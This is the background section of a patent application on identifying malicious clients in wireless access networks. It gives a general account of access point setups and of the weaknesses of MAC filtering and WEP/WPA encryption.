1. Technical Field of the Invention
The present invention relates in general to wireless access network security, and in particular, to identifying malicious clients in wireless access networks.
2. Description of Related Art
Wireless access points (WAPs or APs) enable wireless communication devices (clients) to connect to a wireless network using Wi-Fi (IEEE 802.11) and other related standards, such as WCDMA/CMDA. The AP may connect not only to a wireless network, but also to a wired network, such as a local area network (LAN), to relay data between the wireless devices and wired devices on the LAN. In either case, the WAP is considered part of a wireless access network that provides access to another network, such as the Internet or a LAN.
For example, in a typical corporate environment, several WAPs are attached to the LAN to provide wireless access to the LAN. Within the range of the WAPs, wireless end users have full network connectivity with the benefit of mobility. In this instance, the WAP functions as a gateway for clients to access the LAN. Another wireless topology consists of a series of APs spread over a large area, each connected to a different network, to provide hot spots where wireless clients can connect to the Internet.
Since anyone within the geographic range of a WAP could conceivably connect to the Internet or LAN through the WAP, security measures have been developed to prevent unauthorized access and protect networks against attackers who send spam, release worms or perform other illegal actions using the wireless access network. The most common way to secure a wireless access network is to allow access only from known, approved MAC addresses. However, this approach provides no security against “sniffing” and client devices can easily spoof MAC addresses.
Another common security feature utilized by WAPs to prevent unauthorized access is wireless traffic encryption. For example, the majority of WAPs today incorporate Wired Equivalent Privacy (WEP) encryption or Wi-Fi Protected Access (WPA or WPA2) authentication (password) security protocols. However, security analysts have demonstrated that WEP protection can easily be broken using tools available to the general public. In addition, if a weak password, such as a dictionary word or short character string is used, WPA and WPA2 can be easily cracked. Even using a long random password may not prevent a sophisticated “sniffer” from breaking the network keys.
Once an attacker gains access to a WAP, the attacker can begin to transmit malicious traffic, such as spam, worms and other undesired traffic onto other networks through the wireless access network. The malicious traffic sent by the attacker increases the burden on the WAP, even if the malicious traffic is later identified and dropped by the network. In addition, since the malicious traffic is mixed with good (normal) traffic, it becomes more difficult to detect stealthy attackers/worms.